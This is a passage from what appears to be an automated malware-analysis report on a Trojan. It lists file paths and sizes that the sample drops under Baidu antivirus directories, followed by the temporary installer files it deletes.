%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\InstallCfg.xml (177 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\cache_config.dat (469 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\KVCommonRes.rdb (131925 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll (7547 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0002.sys (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (30968 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\wverify.dat (15019 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsClient.xml (18 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (2 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (19592 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdSvc.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (1552 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (6360 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\fm.dat (597 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (9320 bytes)
%System%\drivers\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (125 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bddownloader.exe (41699 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVMainFrame.dll (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (36536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (1 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMUpdate.dll (673 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch.7z (7433 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (15 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMReport.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CompatibilityChecker.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanS.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (23936 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll (3073 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (1524 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdTray.exe (15116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (12536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\blacksign.dat (852 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMAVEng.dll (4545 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll (1425 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\patch\placeholder_tmp (11 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (1856 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanV.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMMsg.dll (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (75 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll (5873 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dl.dll (14988 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMReport.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (16288 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\GCCommunicate.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (33633 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_product.xml (291 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\systemfile.dat (3 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDDriverFixer.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\user_trusted_list.dat (125 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\putips_wording.dat (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (2392 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVConfig.rdb (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (8752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (58168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (938 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVTray_PluginConfig.xml (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\bd0003.sys (55 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDMAVE.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (7192 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMRepMgr.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (4992 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMPerfMon.dll (1281 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (66750 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\cache_config.dat (469 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (8 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\app.ico (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (46488 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVCached.dll (2105 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDCooly.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (23504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (21480 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDConfig.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (1704 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsBugRpt.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\updlog.dll (13 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsUpdate.exe (37 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (33536 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\DriverManager.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\smr.dat (1 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\KVFixerConfigMgr.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (784 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavCommon.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (8184 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (9605 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavEngine.dll (601 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\licenses\directui license.txt (593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (16368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (33747 bytes)
%Program Files%\Common Files\Baidu\BDDownload\108\7z.dll (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Repair_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavEngine.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWrench.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerLuaScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdBugRpt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonBHO.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdcomproxy.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\virus_type.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\809.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframePluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KavUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\scan_mgr_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\wverify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\811.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\InstallCfg.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMStringUtils.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_customer.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSkin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMBase.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCallbackBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCScriptBind.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\900.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PrivacyProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\iexplore.exe.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVMainFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\directui license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDownloadProtect_x64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\HIPSClient.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\putips_wording.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRecomm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GameNoDisturb.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavFrame.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\patch.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMNet.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\PullUpConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepBase.dll (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPerfMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVEng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DesktopToast.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bddownloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdTray.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMTinyXml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDbSqlite.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerXMLScript.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ad.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DllInject.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMReport.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdRepair.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMFrameWork.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\blacksign.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVE.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\user_trusted_list.dat (0 bytes)
